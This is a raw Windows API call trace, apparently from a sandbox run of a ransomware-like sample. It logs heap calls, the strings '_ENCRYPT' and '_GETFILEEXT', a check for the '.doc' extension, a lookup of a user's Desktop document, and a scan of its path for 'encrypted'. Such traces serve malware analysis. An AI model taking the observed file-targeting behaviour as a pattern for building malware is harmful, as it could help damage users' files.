0x88cdf0 [0031.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.101] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.102] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.102] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.102] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0031.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cbe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.103] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.103] CloseHandle (hObject=0x140) returned 1 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.103] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0031.103] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.104] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.104] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.104] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.104] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.104] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.104] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.104] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.104] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.105] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.105] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0xad2c0a0, ftLastWriteTime.dwHighDateTime=0x1d5b684, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0x7c20c0 [0031.105] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.105] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.105] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0xad2c0a0, ftLastWriteTime.dwHighDateTime=0x1d5b684, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0x7c20c0 [0031.105] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.105] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HaqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aqrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qrV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rV LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 